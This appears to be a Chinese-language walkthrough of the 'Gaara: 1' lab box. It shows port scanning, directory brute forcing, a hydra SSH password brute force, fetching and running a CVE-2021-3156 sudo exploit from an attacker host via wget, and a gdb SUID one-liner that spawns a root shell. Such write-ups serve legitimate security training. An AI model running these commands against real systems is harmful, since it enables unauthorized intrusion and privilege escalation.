Gaara Walkthrough

Box Info

官网在这里:Gaara: 1

image-20250326123110685

The Hack

先对目标主机做端口发现

sudo nmap -p- 172.16.33.69

目标主机开放 22、80 端口

image-20250326110434275

对开放的端口进行应用版本发现

sudo nmap -p22,80 -A -T4 172.16.33.69 

22 端口开放 SSH 服务,80 端口开放 http 服务

image-20250326110603058

先来看 SSH 服务,尝试弱口令远程登陆,同时看看能不能泄露机密信息

ssh root@172.16.33.69

可惜失败了

image-20250326110715391

那么暂时就拿 22 端口没办法了,再来看看 80 端口,进行目录发现

dirsearch -u http://172.16.33.69

呃,一个都没扫描的?

image-20250326111411455

直接访问目标站点看看?

仅为一张图片

image-20250326111749132

但是图片右下角泄露了邮箱,后半段甚至可以是域名

image-20250326111812291

将目标主机 IP 和域名绑定,再次访问试试看

sudo vi /etc/hosts

image-20250326111939206

可惜的是还是不行,看来还有隐藏目录我们没发现,尝试结合字典对目标站点进行目录发现

dirsearch -u http://172.16.33.69 -w /usr/share/wordlists/dirb/big.txt
dirsearch -u http://172.16.33.69 -w /usr/share/wordlists/dirb/common.txt
dirsearch -u http://172.16.33.69 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

幸运的是,找到了 /Cryoserver 目录

image-20250326111308782

眼看起来啥也没有,但是我在右边看到了滚动进度条,在进度条最底下看到了额外的三个目录

image-20250326112630153

在 /iamgara 里面找到了可疑字符串

image-20250326113032549

CyberChef 没跑出来?有点怪啊

image-20250326114624494

既然网站都是关于 Gaara 的描述,那看看能不能用该用户名爆破 SSH 密码

hydra -e nsr -l gaara -P /usr/share/wordlists/rockyou.txt ssh://172.16.33.69

幸运的是,密码被爆破出来了

image-20250326115056046

直接 SSH 远程登陆

ssh gaara@172.16.33.69

成功突破边界

image-20250326115157844

获得 flag.txt

image-20250326115555231

同时发现可疑文件 Kazekage.txt ,内容似乎是 base64 编码,解密出来是一个目录

image-20250326115855797

在目录内发现抽象密文

image-20250326120609244

可通过在线工具 El Brainfuck 进行解密,看起来是烟雾弹

image-20250326120716583

看看 sudo 版本

gaara@Gaara:~$ sudo -V
Sudo version 1.8.27
sudo: unable to resolve host Gaara: Temporary failure in name resolution
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27

看起来可以使用 CVE-2021-3156 提权

cd /tmp
wget http://10.8.0.90/exploit_nss.py -O exp.py
chmod +x exp.py
python exp.py

成功获得 root 权限

image-20250326121834252

获得 root.txt

image-20250326121912200

当然,在查找哪些文件具有 SUID 权限时,发现了 gdb 文件

image-20250326122634005

直接切换至 /usr/bin 目录,执行

./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

可直接提权成功

image-20250326122802782